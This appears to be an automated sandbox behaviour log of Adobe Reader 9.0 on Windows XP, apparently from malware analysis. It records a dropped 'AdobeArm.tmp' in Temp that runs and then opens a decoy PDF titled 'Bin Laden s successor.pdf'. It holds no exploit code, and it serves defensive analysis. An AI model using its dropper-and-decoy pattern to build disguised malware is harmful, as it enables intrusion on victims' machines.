C:\Program Files\Adobe\Reader 9.0\Reader\plug_ins\Multimedia.api	query and read	commit	3E90000	1409024	own pid	readonly	success or wait	1
C:\Program Files\Adobe\Reader 9.0\Reader\plug_ins\pddom.DEU	write and read and execute	commit	3E90000	12288	own pid	execute	success or wait	1
C:\Program Files\Adobe\Reader 9.0\Reader\plug_ins\pddom.DEU	query and read	commit	3E90000	12288	own pid	readonly	success or wait	1
C:\Program Files\Adobe\Reader 9.0\Reader\plug_ins\PDDom.api	write and read and execute	commit	3E90000	401408	own pid	execute	success or wait	1
C:\Program Files\Adobe\Reader 9.0\Reader\plug_ins\PDDom.api	query and read	commit	3E90000	401408	own pid	readonly	success or wait	1
C:\Program Files\Adobe\Reader 9.0\Reader\plug_ins\PDDom.api	write and read and execute	commit	3E90000	401408	own pid	execute	success or wait	1
C:\Program Files\Adobe\Reader 9.0\Reader\plug_ins\PDDom.api	query and read	commit	3E90000	401408	own pid	readonly	success or wait	1
C:\Program Files\Adobe\Reader 9.0\Reader\plug_ins\PPKLITE.DEU	write and read and execute	commit	3E90000	1060864	own pid	execute	success or wait	1
C:\Program Files\Adobe\Reader 9.0\Reader\plug_ins\PPKLITE.DEU	query and read	commit	3E90000	1060864	own pid	readonly	success or wait	1
C:\Program Files\Adobe\Reader 9.0\Reader\plug_ins\PPKLite.api	write and read and execute	commit	4160000	6959104	own pid	execute	success or wait	1
C:\Program Files\Adobe\Reader 9.0\Reader\plug_ins\PPKLite.api	query and read	commit	4160000	6959104	own pid	readonly	success or wait	1
C:\Program Files\Adobe\Reader 9.0\Reader\plug_ins\PPKLite.api	write and read and execute	commit	4160000	6959104	own pid	execute	success or wait	1
C:\Program Files\Adobe\Reader 9.0\Reader\plug_ins\PPKLite.api	query and read	commit	4160000	6959104	own pid	readonly	success or wait	1
C:\Program Files\Adobe\Reader 9.0\Reader\plug_ins\ReadOutLoud.DEU	write and read and execute	commit	3E90000	16384	own pid	execute	success or wait	1
C:\Program Files\Adobe\Reader 9.0\Reader\plug_ins\ReadOutLoud.DEU	query and read	commit	3E90000	16384	own pid	readonly	success or wait	1
C:\Program Files\Adobe\Reader 9.0\Reader\plug_ins\ReadOutLoud.api	write and read and execute	commit	3E90000	110592	own pid	execute	success or wait	1
C:\Program Files\Adobe\Reader 9.0\Reader\plug_ins\ReadOutLoud.api	query and read	commit	3E90000	110592	own pid	readonly	success or wait	1
C:\Program Files\Adobe\Reader 9.0\Reader\plug_ins\ReadOutLoud.api	write and read and execute	commit	3E90000	110592	own pid	execute	success or wait	1
C:\Program Files\Adobe\Reader 9.0\Reader\plug_ins\ReadOutLoud.api	query and read	commit	3E90000	110592	own pid	readonly	success or wait	1
C:\Program Files\Adobe\Reader 9.0\Reader\plug_ins\reflow.DEU	write and read and execute	commit	3E90000	8192	own pid	execute	success or wait	1
C:\Program Files\Adobe\Reader 9.0\Reader\plug_ins\reflow.DEU	query and read	commit	3E90000	8192	own pid	readonly	success or wait	1
C:\Program Files\Adobe\Reader 9.0\Reader\plug_ins\reflow.api	write and read and execute	commit	3E90000	364544	own pid	execute	success or wait	1
C:\Program Files\Adobe\Reader 9.0\Reader\plug_ins\reflow.api	query and read	commit	3E90000	364544	own pid	readonly	success or wait	1
C:\Program Files\Adobe\Reader 9.0\Reader\plug_ins\reflow.api	write and read and execute	commit	3E90000	364544	own pid	execute	success or wait	1
C:\Program Files\Adobe\Reader 9.0\Reader\plug_ins\reflow.api	query and read	commit	3E90000	364544	own pid	readonly	success or wait	1
C:\Program Files\Adobe\Reader 9.0\Reader\plug_ins\SaveAsRTF.DEU	write and read and execute	commit	3E90000	24576	own pid	execute	success or wait	1
C:\Program Files\Adobe\Reader 9.0\Reader\plug_ins\SaveAsRTF.DEU	query and read	commit	3E90000	24576	own pid	readonly	success or wait	1
C:\Program Files\Adobe\Reader 9.0\Reader\plug_ins\SaveAsRTF.api	write and read and execute	commit	3E90000	348160	own pid	execute	success or wait	1
C:\Program Files\Adobe\Reader 9.0\Reader\plug_ins\SaveAsRTF.api	query and read	commit	3E90000	348160	own pid	readonly	success or wait	1
C:\Program Files\Adobe\Reader 9.0\Reader\plug_ins\SaveAsRTF.api	write and read and execute	commit	3E90000	348160	own pid	execute	success or wait	1
C:\Program Files\Adobe\Reader 9.0\Reader\plug_ins\SaveAsRTF.api	query and read	commit	3E90000	348160	own pid	readonly	success or wait	1
C:\Program Files\Adobe\Reader 9.0\Reader\plug_ins\Search.DEU	write and read and execute	commit	3E90000	57344	own pid	execute	success or wait	1
C:\Program Files\Adobe\Reader 9.0\Reader\plug_ins\Search.DEU	query and read	commit	3E90000	57344	own pid	readonly	success or wait	1
C:\Program Files\Adobe\Reader 9.0\Reader\plug_ins\Search.api	write and read and execute	commit	3E90000	401408	own pid	execute	success or wait	1
C:\Program Files\Adobe\Reader 9.0\Reader\plug_ins\Search.api	query and read	commit	3E90000	401408	own pid	readonly	success or wait	1
C:\Program Files\Adobe\Reader 9.0\Reader\plug_ins\Search.api	write and read and execute	commit	3E90000	401408	own pid	execute	success or wait	1
C:\Program Files\Adobe\Reader 9.0\Reader\plug_ins\Search.api	query and read	commit	3E90000	401408	own pid	readonly	success or wait	1
C:\Program Files\Adobe\Reader 9.0\Reader\plug_ins\Search5.DEU	write and read and execute	commit	3E90000	12288	own pid	execute	success or wait	1
C:\Program Files\Adobe\Reader 9.0\Reader\plug_ins\Search5.DEU	query and read	commit	3E90000	12288	own pid	readonly	success or wait	1
C:\Program Files\Adobe\Reader 9.0\Reader\plug_ins\Search5.api	write and read and execute	commit	3E90000	90112	own pid	execute	success or wait	1
C:\Program Files\Adobe\Reader 9.0\Reader\plug_ins\Search5.api	query and read	commit	3E90000	90112	own pid	readonly	success or wait	1
C:\Program Files\Adobe\Reader 9.0\Reader\plug_ins\Search5.api	write and read and execute	commit	3E90000	90112	own pid	execute	success or wait	1
C:\Program Files\Adobe\Reader 9.0\Reader\plug_ins\Search5.api	query and read	commit	3E90000	90112	own pid	readonly	success or wait	1
C:\Program Files\Adobe\Reader 9.0\Reader\plug_ins\SendMail.deu	write and read and execute	commit	3E90000	28672	own pid	execute	success or wait	1
C:\Program Files\Adobe\Reader 9.0\Reader\plug_ins\SendMail.deu	query and read	commit	3E90000	28672	own pid	readonly	success or wait	1
C:\Program Files\Adobe\Reader 9.0\Reader\plug_ins\SendMail.api	write and read and execute	commit	3E90000	122880	own pid	execute	success or wait	1
C:\Program Files\Adobe\Reader 9.0\Reader\plug_ins\SendMail.api	query and read	commit	3E90000	122880	own pid	readonly	success or wait	1
C:\Program Files\Adobe\Reader 9.0\Reader\plug_ins\SendMail.api	write and read and execute	commit	3E90000	122880	own pid	execute	success or wait	1
C:\Program Files\Adobe\Reader 9.0\Reader\plug_ins\SendMail.api	query and read	commit	3E90000	122880	own pid	readonly	success or wait	1
C:\Program Files\Adobe\Reader 9.0\Reader\plug_ins\Spelling.DEU	write and read and execute	commit	3E90000	36864	own pid	execute	success or wait	1
C:\Program Files\Adobe\Reader 9.0\Reader\plug_ins\Spelling.DEU	query and read	commit	3E90000	36864	own pid	readonly	success or wait	1
C:\Program Files\Adobe\Reader 9.0\Reader\plug_ins\Spelling.api	write and read and execute	commit	3E90000	274432	own pid	execute	success or wait	1
C:\Program Files\Adobe\Reader 9.0\Reader\plug_ins\Spelling.api	query and read	commit	3E90000	274432	own pid	readonly	success or wait	1
C:\Program Files\Adobe\Reader 9.0\Reader\plug_ins\Spelling.api	write and read and execute	commit	3E90000	274432	own pid	execute	success or wait	1
C:\Program Files\Adobe\Reader 9.0\Reader\plug_ins\Spelling.api	query and read	commit	3E90000	274432	own pid	readonly	success or wait	1
C:\Program Files\Adobe\Reader 9.0\Reader\plug_ins\updater.DEU	write and read and execute	commit	3E90000	12288	own pid	execute	success or wait	1
C:\Program Files\Adobe\Reader 9.0\Reader\plug_ins\updater.DEU	query and read	commit	3E90000	12288	own pid	readonly	success or wait	1
C:\Program Files\Adobe\Reader 9.0\Reader\plug_ins\Updater.api	write and read and execute	commit	3E90000	233472	own pid	execute	success or wait	1
C:\Program Files\Adobe\Reader 9.0\Reader\plug_ins\Updater.api	query and read	commit	3E90000	233472	own pid	readonly	success or wait	1
C:\Program Files\Adobe\Reader 9.0\Reader\plug_ins\Updater.api	write and read and execute	commit	3E90000	233472	own pid	execute	success or wait	1
C:\Program Files\Adobe\Reader 9.0\Reader\plug_ins\Updater.api	query and read	commit	3E90000	233472	own pid	readonly	success or wait	1
C:\Program Files\Adobe\Reader 9.0\Reader\plug_ins\Weblink.DEU	write and read and execute	commit	3E90000	49152	own pid	execute	success or wait	1
C:\Program Files\Adobe\Reader 9.0\Reader\plug_ins\Weblink.DEU	query and read	commit	3E90000	49152	own pid	readonly	success or wait	1
C:\Program Files\Adobe\Reader 9.0\Reader\plug_ins\weblink.api	write and read and execute	commit	3E90000	270336	own pid	execute	success or wait	1
C:\Program Files\Adobe\Reader 9.0\Reader\plug_ins\weblink.api	query and read	commit	3E90000	270336	own pid	readonly	success or wait	1
C:\Program Files\Adobe\Reader 9.0\Reader\plug_ins\weblink.api	write and read and execute	commit	3E90000	270336	own pid	execute	success or wait	1
C:\Program Files\Adobe\Reader 9.0\Reader\plug_ins\weblink.api	query and read	commit	3E90000	270336	own pid	readonly	success or wait	1
C:\Program Files\Adobe\Reader 9.0\Reader\plug_ins\PPKLite.api	write and read and execute	commit	4160000	6959104	own pid	execute	success or wait	1
C:\Program Files\Adobe\Reader 9.0\Reader\plug_ins\PPKLite.api	query and write and read and execute	image	28000000	6983680	own pid	read write	success or wait	1
\KnownDlls\WSOCK32.dll	write and read and execute	unknown	28000000	6983680	own pid	read write	object name not found	1
C:\WINDOWS\system32\wsock32.dll	query and write and read and execute	image	71AD0000	36864	own pid	read write	success or wait	1
\KnownDlls\WS2_32.dll	write and read and execute	unknown	71AD0000	36864	own pid	read write	object name not found	1
C:\WINDOWS\system32\ws2_32.dll	query and write and read and execute	image	71AB0000	94208	own pid	read write	success or wait	1
\KnownDlls\WS2HELP.dll	write and read and execute	unknown	71AB0000	94208	own pid	read write	object name not found	1
C:\WINDOWS\system32\ws2help.dll	query and write and read and execute	image	71AA0000	32768	own pid	read write	success or wait	1
C:\Program Files\Adobe\Reader 9.0\Reader\plug_ins\PPKLITE.DEU	write and read and execute	commit	3EC0000	1060864	own pid	execute	success or wait	1
C:\Program Files\Adobe\Reader 9.0\Reader\plug_ins\PPKLITE.DEU	query and read	commit	3EC0000	1060864	own pid	readonly	success or wait	1
C:\Program Files\Adobe\Reader 9.0\Reader\plug_ins\PPKLITE.DEU	write and read and execute	commit	3EC0000	1060864	own pid	execute	success or wait	1
C:\Program Files\Adobe\Reader 9.0\Reader\plug_ins\PPKLITE.DEU	query and read	commit	3EC0000	1060864	own pid	readonly	success or wait	1
C:\Program Files\Adobe\Reader 9.0\Reader\plug_ins\PPKLITE.DEU	write and read and execute	commit	3EC0000	1060864	own pid	execute	success or wait	1
C:\Program Files\Adobe\Reader 9.0\Reader\plug_ins\PPKLITE.DEU	query and write and read and execute	image	3EC0000	1060864	own pid	read write	conflicting addresses	1
C:\Program Files\Adobe\Reader 9.0\Resource\Font\CourierStd.otf	query and read	commit	3FE0000	36864	own pid	readonly	success or wait	1
C:\Program Files\Adobe\Reader 9.0\Resource\Font\CourierStd.otf	query and read	commit	3FE0000	36864	own pid	readonly	success or wait	1
C:\Program Files\Adobe\Reader 9.0\Reader\icucnv36.dll	write and read and execute	commit	4160000	679936	own pid	execute	success or wait	1
C:\Program Files\Adobe\Reader 9.0\Reader\icucnv36.dll	query and write and read and execute	image	4A800000	684032	own pid	read write	success or wait	1
\KnownDlls\icudt36.dll	write and read and execute	unknown	4A800000	684032	own pid	read write	object name not found	1
C:\Program Files\Adobe\Reader 9.0\Reader\icudt36.dll	query and write and read and execute	image	4AD00000	94208	own pid	read write	success or wait	1
C:\Program Files\Adobe\Reader 9.0\Resource\Font\CourierStd-Oblique.otf	query and read	commit	3FE0000	40960	own pid	readonly	success or wait	1
C:\Program Files\Adobe\Reader 9.0\Resource\Font\CourierStd-Oblique.otf	query and read	commit	3FE0000	40960	own pid	readonly	success or wait	1
C:\Program Files\Adobe\Reader 9.0\Resource\Font\CourierStd-Bold.otf	query and read	commit	3FE0000	36864	own pid	readonly	success or wait	1
C:\Program Files\Adobe\Reader 9.0\Resource\Font\CourierStd-Bold.otf	query and read	commit	3FE0000	36864	own pid	readonly	success or wait	1
C:\Program Files\Adobe\Reader 9.0\Resource\Font\CourierStd-BoldOblique.otf	query and read	commit	3FE0000	40960	own pid	readonly	success or wait	1
C:\Program Files\Adobe\Reader 9.0\Resource\Font\CourierStd-BoldOblique.otf	query and read	commit	3FE0000	40960	own pid	readonly	success or wait	1
C:\Program Files\Adobe\Reader 9.0\Resource\Font\SY______.PFB	query and read	commit	3FE0000	36864	own pid	readonly	success or wait	1
C:\Program Files\Adobe\Reader 9.0\Resource\Font\AdobePiStd.otf	query and read	commit	4160000	90112	own pid	readonly	success or wait	1
C:\Program Files\Adobe\Reader 9.0\Resource\Font\AdobePiStd.otf	query and read	commit	4160000	90112	own pid	readonly	success or wait	1
C:\Program Files\Adobe\Reader 9.0\Resource\CMap\Identity-H	query and read	commit	3FE0000	8192	own pid	readonly	success or wait	1
C:\Program Files\Adobe\Reader 9.0\Resource\CMap\Identity-V	query and read	commit	3FE0000	4096	own pid	readonly	success or wait	1
C:\Program Files\Adobe\Reader 9.0\Resource\CMap\Identity-H	query and read	commit	3FE0000	8192	own pid	readonly	success or wait	1
C:\Program Files\Adobe\Reader 9.0\Resource\CMap\Identity-V	query and read	commit	3FE0000	4096	own pid	readonly	success or wait	1
C:\Program Files\Adobe\Reader 9.0\Resource\Font\AdobePiStd.otf	query and read	commit	4160000	90112	own pid	readonly	success or wait	1
C:\Program Files\Adobe\Reader 9.0\Resource\Font\AdobePiStd.otf	query and read	commit	4160000	90112	own pid	readonly	success or wait	1
C:\Program Files\Adobe\Reader 9.0\Resource\Font\CourierStd-Bold.otf	query and read	commit	3FE0000	36864	own pid	readonly	success or wait	1
C:\Program Files\Adobe\Reader 9.0\Resource\Font\CourierStd-Bold.otf	query and read	commit	3FE0000	36864	own pid	readonly	success or wait	1
C:\Program Files\Adobe\Reader 9.0\Resource\Font\CourierStd-BoldOblique.otf	query and read	commit	3FE0000	40960	own pid	readonly	success or wait	1
C:\Program Files\Adobe\Reader 9.0\Resource\Font\CourierStd-BoldOblique.otf	query and read	commit	3FE0000	40960	own pid	readonly	success or wait	1
C:\Program Files\Adobe\Reader 9.0\Resource\Font\CourierStd-Oblique.otf	query and read	commit	3FE0000	40960	own pid	readonly	success or wait	1
C:\Program Files\Adobe\Reader 9.0\Resource\Font\CourierStd-Oblique.otf	query and read	commit	3FE0000	40960	own pid	readonly	success or wait	1
C:\Program Files\Adobe\Reader 9.0\Resource\Font\CourierStd.otf	query and read	commit	3FE0000	36864	own pid	readonly	success or wait	1
C:\Program Files\Adobe\Reader 9.0\Resource\Font\CourierStd.otf	query and read	commit	3FE0000	36864	own pid	readonly	success or wait	1
C:\Program Files\Adobe\Reader 9.0\Resource\Font\MinionPro-Bold.otf	query and read	commit	4160000	233472	own pid	readonly	success or wait	1
C:\Program Files\Adobe\Reader 9.0\Resource\Font\MinionPro-Bold.otf	query and read	commit	4160000	233472	own pid	readonly	success or wait	1
C:\Program Files\Adobe\Reader 9.0\Resource\Font\MinionPro-BoldIt.otf	query and read	commit	4160000	278528	own pid	readonly	success or wait	1
C:\Program Files\Adobe\Reader 9.0\Resource\Font\MinionPro-BoldIt.otf	query and read	commit	4160000	278528	own pid	readonly	success or wait	1
C:\Program Files\Adobe\Reader 9.0\Resource\Font\MinionPro-It.otf	query and read	commit	4160000	278528	own pid	readonly	success or wait	1
C:\Program Files\Adobe\Reader 9.0\Resource\Font\MinionPro-It.otf	query and read	commit	4160000	278528	own pid	readonly	success or wait	1
C:\Program Files\Adobe\Reader 9.0\Resource\Font\MinionPro-Regular.otf	query and read	commit	4160000	233472	own pid	readonly	success or wait	1
C:\Program Files\Adobe\Reader 9.0\Resource\Font\MinionPro-Regular.otf	query and read	commit	4160000	233472	own pid	readonly	success or wait	1
C:\Program Files\Adobe\Reader 9.0\Resource\Font\MyriadPro-Bold.otf	query and read	commit	4160000	98304	own pid	readonly	success or wait	1
C:\Program Files\Adobe\Reader 9.0\Resource\Font\MyriadPro-Bold.otf	query and read	commit	4160000	98304	own pid	readonly	success or wait	1
C:\Program Files\Adobe\Reader 9.0\Resource\Font\MyriadPro-BoldIt.otf	query and read	commit	4160000	102400	own pid	readonly	success or wait	1
C:\Program Files\Adobe\Reader 9.0\Resource\Font\MyriadPro-BoldIt.otf	query and read	commit	4160000	102400	own pid	readonly	success or wait	1
C:\Program Files\Adobe\Reader 9.0\Resource\Font\MyriadPro-It.otf	query and read	commit	4160000	98304	own pid	readonly	success or wait	1
C:\Program Files\Adobe\Reader 9.0\Resource\Font\MyriadPro-It.otf	query and read	commit	4160000	98304	own pid	readonly	success or wait	1
C:\Program Files\Adobe\Reader 9.0\Resource\Font\MyriadPro-Regular.otf	query and read	commit	4160000	98304	own pid	readonly	success or wait	1
C:\Program Files\Adobe\Reader 9.0\Resource\Font\MyriadPro-Regular.otf	query and read	commit	4160000	98304	own pid	readonly	success or wait	1
C:\Program Files\Adobe\Reader 9.0\Resource\Font\SY______.PFB	query and read	commit	3FE0000	36864	own pid	readonly	success or wait	1
C:\Program Files\Adobe\Reader 9.0\Resource\Font\ZX______.PFB	query and read	commit	4160000	77824	own pid	readonly	success or wait	1
C:\Program Files\Adobe\Reader 9.0\Resource\Font\ZY______.PFB	query and read	commit	4160000	98304	own pid	readonly	success or wait	1
C:\Program Files\Adobe\Reader 9.0\Resource\CMap\Identity-H	query and read	commit	3FE0000	8192	own pid	readonly	success or wait	1
C:\Program Files\Adobe\Reader 9.0\Resource\CMap\Identity-V	query and read	commit	3FE0000	4096	own pid	readonly	success or wait	1
\KnownDlls\ATMLIB.dll	write and read and execute	unknown	3FE0000	4096	own pid	readonly	object name not found	1
C:\WINDOWS\system32\atmlib.dll	query and write and read and execute	image	73C20000	45056	own pid	read write	success or wait	1
C:\Program Files\Adobe\Reader 9.0\Resource\Font\CourierStd.otf	query and read	commit	3FE0000	36864	own pid	readonly	success or wait	1
C:\Program Files\Adobe\Reader 9.0\Resource\Font\CourierStd-Oblique.otf	query and read	commit	3FE0000	40960	own pid	readonly	success or wait	1
C:\Program Files\Adobe\Reader 9.0\Resource\Font\CourierStd-Bold.otf	query and read	commit	3FE0000	36864	own pid	readonly	success or wait	1
C:\Program Files\Adobe\Reader 9.0\Resource\Font\CourierStd-BoldOblique.otf	query and read	commit	3FE0000	40960	own pid	readonly	success or wait	1
C:\Program Files\Adobe\Reader 9.0\Resource\Font\SY______.PFB	query and read	commit	3FE0000	36864	own pid	readonly	success or wait	1
C:\Program Files\Adobe\Reader 9.0\Resource\Font\AdobePiStd.otf	query and read	commit	4160000	90112	own pid	readonly	success or wait	1
C:\Program Files\Adobe\Reader 9.0\Resource\Font\MinionPro-Bold.otf	query and read	commit	4160000	233472	own pid	readonly	success or wait	1
C:\Program Files\Adobe\Reader 9.0\Resource\Font\MinionPro-BoldIt.otf	query and read	commit	4160000	278528	own pid	readonly	success or wait	1
C:\Program Files\Adobe\Reader 9.0\Resource\Font\MinionPro-It.otf	query and read	commit	4160000	278528	own pid	readonly	success or wait	1
C:\Program Files\Adobe\Reader 9.0\Resource\Font\MinionPro-Regular.otf	query and read	commit	4160000	233472	own pid	readonly	success or wait	1
C:\Program Files\Adobe\Reader 9.0\Resource\Font\MyriadPro-Bold.otf	query and read	commit	4160000	98304	own pid	readonly	success or wait	1
C:\Program Files\Adobe\Reader 9.0\Resource\Font\MyriadPro-BoldIt.otf	query and read	commit	4160000	102400	own pid	readonly	success or wait	1
C:\Program Files\Adobe\Reader 9.0\Resource\Font\MyriadPro-It.otf	query and read	commit	4160000	98304	own pid	readonly	success or wait	1
C:\Program Files\Adobe\Reader 9.0\Resource\Font\MyriadPro-Regular.otf	query and read	commit	4160000	98304	own pid	readonly	success or wait	1
\BaseNamedObjects\Local\UrlZonesSM_Administrator	query and write and read	commit	4160000	98304	own pid	readonly	object name exists	1
\KnownDlls\BIBUtils.dll	write and read and execute	unknown	4160000	98304	own pid	readonly	object name not found	1
C:\Program Files\Adobe\Reader 9.0\Reader\BIBUtils.dll	query and write and read and execute	image	4FB0000	167936	own pid	read write	conflicting addresses	1
none	query and write and read and execute	commit	4FE0000	65536	own pid	execute and read and write	success or wait	1
C:\DOCUME~1\ADMINI~1\LOCALS~1\Temp\AdobeArm.tmp	query and write and read and execute and extend size	image	4FE0000	65536	own pid	execute and read and write	success or wait	1
C:\WINDOWS\system32\apphelp.dll	write and read and execute	commit	5FD0000	126976	own pid	execute	success or wait	1
C:\WINDOWS\system32\apphelp.dll	query and write and read and execute	image	77B40000	139264	own pid	read write	success or wait	1
C:\WINDOWS\AppPatch\sysmain.sdb	read	commit	25980000	1208320	own pid	readonly	success or wait	1
C:\DOCUME~1\ADMINI~1\LOCALS~1\Temp\AdobeArm.tmp	query and read	commit	4FF0000	49152	own pid	readonly	success or wait	1
C:\Program Files\Adobe\Reader 9.0\Reader\AcroRd32.exe	query and write and read and execute and extend size	image	4FF0000	49152	own pid	readonly	success or wait	1
C:\Program Files\Adobe\Reader 9.0\Reader\AcroRd32.exe	query and read	commit	7F20000	352256	own pid	readonly	success or wait	1

+ Section loaded by program
File Path	Access	Type	Base	Size	Mapped to pid	Protection	Completion	Count	Source Address
\KnownDlls\AcroRd32.dll	write and read and execute	unknown	390000	4096	own pid	readonly	object name not found	1	4038E2
C:\Program Files\Adobe\Reader 9.0\Reader\AcroRd32.dll	query and write and read and execute	image	940000	20512768	own pid	read write	conflicting addresses	1	4038E2
\KnownDlls\WININET.dll	write and read and execute	unknown	3D930000	942080	own pid	read write	success or wait	1	4038E2
\KnownDlls\Normaliz.dll	write and read and execute	unknown	3C0000	36864	own pid	read write	conflicting addresses	1	4038E2
\KnownDlls\urlmon.dll	write and read and execute	unknown	1CD0000	1257472	own pid	read write	conflicting addresses	1	4038E2
\KnownDlls\ole32.dll	write and read and execute	unknown	774E0000	1302528	own pid	read write	success or wait	1	4038E2
\KnownDlls\OLEAUT32.dll	write and read and execute	unknown	77120000	569344	own pid	read write	success or wait	1	4038E2
\KnownDlls\iertutil.dll	write and read and execute	unknown	3DFD0000	2002944	own pid	read write	success or wait	1	4038E2
\KnownDlls\VERSION.dll	write and read and execute	unknown	77C00000	32768	own pid	read write	success or wait	1	4038E2
\KnownDlls\AGM.dll	write and read and execute	unknown	77C00000	32768	own pid	read write	object name not found	1	4038E2
C:\Program Files\Adobe\Reader 9.0\Reader\AGM.dll	query and write and read and execute	image	6000000	5902336	own pid	read write	success or wait	1	4038E2
\KnownDlls\CoolType.dll	write and read and execute	unknown	6000000	5902336	own pid	read write	object name not found	1	4038E2
C:\Program Files\Adobe\Reader 9.0\Reader\CoolType.dll	query and write and read and execute	image	8000000	2486272	own pid	read write	success or wait	1	4038E2
\KnownDlls\USERENV.dll	write and read and execute	unknown	769C0000	737280	own pid	read write	success or wait	1	4038E2
\KnownDlls\WINMM.dll	write and read and execute	unknown	769C0000	737280	own pid	read write	object name not found	1	4038E2
C:\WINDOWS\system32\winmm.dll	query and write and read and execute	image	76B40000	184320	own pid	read write	success or wait	1	4038E2
\KnownDlls\BIB.dll	write and read and execute	unknown	76B40000	184320	own pid	read write	object name not found	1	4038E2
C:\Program Files\Adobe\Reader 9.0\Reader\BIB.dll	query and write and read and execute	image	7000000	114688	own pid	read write	success or wait	1	4038E2
\KnownDlls\ACE.dll	write and read and execute	unknown	7000000	114688	own pid	read write	object name not found	1	4038E2
C:\Program Files\Adobe\Reader 9.0\Reader\ACE.dll	query and write and read and execute	image	5000000	798720	own pid	read write	success or wait	1	4038E2

Registry Activities:

+ Key value queried
Key Path	Name	Completion	Count	Source Address
HKEY_LOCAL_MACHINE\SYSTEM\Setup	EnablePrefetcher	success or wait	1	40103D

Process Activities:

+ Process started
PID	Filepath	Cmdline	Flags	Completion	Count	Source Address
4076	C:\DOCUME~1\ADMINI~1\LOCALS~1\Temp\AdobeArm.tmp	C:\DOCUME~1\ADMINI~1\LOCALS~1\Temp\AdobeArm.tmp	0	success or wait	1	4FE0368
1904	C:\Program Files\Adobe\Reader 9.0\Reader\AcroRd32.exe	C:\Program Files\Adobe\Reader 9.0\Reader\AcroRd32.exe C:\DOCUME~1\ADMINI~1\LOCALS~1\Temp\Bin Laden s successor.pdf	0	success or wait	1	4FE0566

+ Process terminated
PID	Filepath	Completion	Count	Source Address
3208	C:\Program Files\Adobe\Reader 9.0\Reader\AcroRd32.exe	success or wait	0	4FE057C

User Activities:

+ Window found
Window name	Class name	HWND of window	Completion	Count	Source Address
no string	AdobeAcrobatSpeedLaunchCmdWnd	0	success	2	0
no string	AdobeReaderSpeedLaunchCmdWnd	0	success	2	0

+ Chronological sections
Operation	Data	Completion	Time
Section loaded	Path: \KnownDlls\kernel32.dll Access: write and read and execute Type: unknown Baseaddress: 7C800000 Size: 1007616 Protection: read write Mapped to pid: own pid	success or wait	1955801872
Section loaded	Path: none Access: query and write and read and execute and extend size Type: reserve Baseaddress: 7C800000 Size: 1007616 Protection: read write Mapped to pid: own pid	success or wait	1955805653
Section loaded	Path: \NLS\NlsSectionUnicode Access: read Type: unknown Baseaddress: 270000 Size: 90112 Protection: readonly Mapped to pid: own pid	success or wait	1955809309
Section loaded	Path: \NLS\NlsSectionLocale Access: read Type: unknown Baseaddress: 290000 Size: 266240 Protection: readonly Mapped to pid: own pid	success or wait	1955810646
Section loaded	Path: \NLS\NlsSectionSortkey Access: query and read Type: unknown Baseaddress: 2E0000 Size: 266240 Protection: readonly Mapped to pid: own pid	success or wait	1955811750
Section loaded	Path: \NLS\NlsSectionSortTbls Access: read Type: unknown Baseaddress: 330000 Size: 24576 Protection: readonly Mapped to pid: own pid	success or wait	1955812480
Section loaded	Path: \NLS\NlsSectionSortkey00000409 Access: read Type: unknown Baseaddress: 330000 Size: 24576 Protection: readonly Mapped to pid: own pid	object name not found	1955813955
Section loaded	Path: \NLS\NlsSectionSortkey00000409 Access: read Type: unknown Baseaddress: 330000 Size: 24576 Protection: readonly Mapped to pid: own pid	object name not found	1955814315
Section loaded	Path: \KnownDlls\USER32.dll Access: write and read and execute Type: unknown Baseaddress: 7E410000 Size: 593920 Protection: read write Mapped to pid: own pid	success or wait	1955816902
Section loaded	Path: \KnownDlls\GDI32.dll Access: write and read and execute Type: unknown Baseaddress: 77F10000 Size: 299008 Protection: read write Mapped to pid: own pid	success or wait	1955818144
Section loaded	Path: \KnownDlls\ADVAPI32.dll Access: write and read and execute Type: unknown Baseaddress: 77DD0000 Size: 634880 Protection: read write Mapped to pid: own pid	success or wait	1955825207
Section loaded	Path: \KnownDlls\RPCRT4.dll Access: write and read and execute Type: unknown Baseaddress: 77E70000 Size: 602112 Protection: read write Mapped to pid: own pid	success or wait	1955828697
Section loaded	Path: \KnownDlls\Secur32.dll Access: write and read and execute Type: unknown Baseaddress: 77FE0000 Size: 69632 Protection: read write Mapped to pid: own pid	success or wait	1955833241
Section loaded	Path: \KnownDlls\SHELL32.dll Access: write and read and execute Type: unknown Baseaddress: 7C9C0000 Size: 8482816 Protection: read write Mapped to pid: own pid	success or wait	1955839195
Section loaded	Path: \KnownDlls\msvcrt.dll Access: write and read and execute Type: unknown Baseaddress: 77C10000 Size: 360448 Protection: read write Mapped to pid: own pid	success or wait	1955842982
Section loaded	Path: \KnownDlls\SHLWAPI.dll Access: write and read and execute Type: unknown Baseaddress: 77F60000 Size: 483328 Protection: read write Mapped to pid: own pid	success or wait	1955848195
Section loaded	Path: C:\WINDOWS\WinSxS\x86_Microsoft.VC80.CRT_1fc8b3b9a1e18e3b_8.0.50727.3053_x-ww_b80fa8ca\msvcp80.dll Access: query and write and read and execute Type: image Baseaddress: 7C420000 Size: 552960 Protection: read write Mapped to pid: own pid	success or wait	1955859403
Section loaded	Path: C:\WINDOWS\WinSxS\x86_Microsoft.VC80.CRT_1fc8b3b9a1e18e3b_8.0.50727.3053_x-ww_b80fa8ca\msvcr80.dll Access: query and write and read and execute Type: image Baseaddress: 78130000 Size: 634880 Protection: read write Mapped to pid: own pid	success or wait	1955863016
Section loaded	Path: C:\WINDOWS\system32\imm32.dll Access: write and read and execute Type: commit Baseaddress: 340000 Size: 110592 Protection: execute Mapped to pid: own pid	success or wait	1955875631
Section loaded	Path: C:\WINDOWS\system32\imm32.dll Access: write and read and execute Type: commit Baseaddress: 340000 Size: 110592 Protection: execute Mapped to pid: own pid	success or wait	1955878184
Section loaded	Path: C:\WINDOWS\system32\imm32.dll Access: query and write and read and execute Type: image Baseaddress: 76390000 Size: 118784 Protection: read write Mapped to pid: own pid	success or wait	1955880304
Section loaded	Path: \NLS\NlsSectionCType Access: read Type: unknown Baseaddress: 370000 Size: 12288 Protection: readonly Mapped to pid: own pid	success or wait	1955897260
Section loaded	Path: C:\WINDOWS\system32\shell32.dll Access: read Type: commit Baseaddress: 940000 Size: 8462336 Protection: readonly Mapped to pid: own pid	success or wait	1955903358
Section loaded	Path: C:\WINDOWS\WinSxS\x86_Microsoft.Windows.Common-Controls_6595b64144ccf1df_6.0.2600.6028_x-ww_61e65202\comctl32.dll Access: write and read and execute Type: commit Baseaddress: 940000 Size: 1056768 Protection: execute Mapped to pid: own pid	success or wait	1955943472
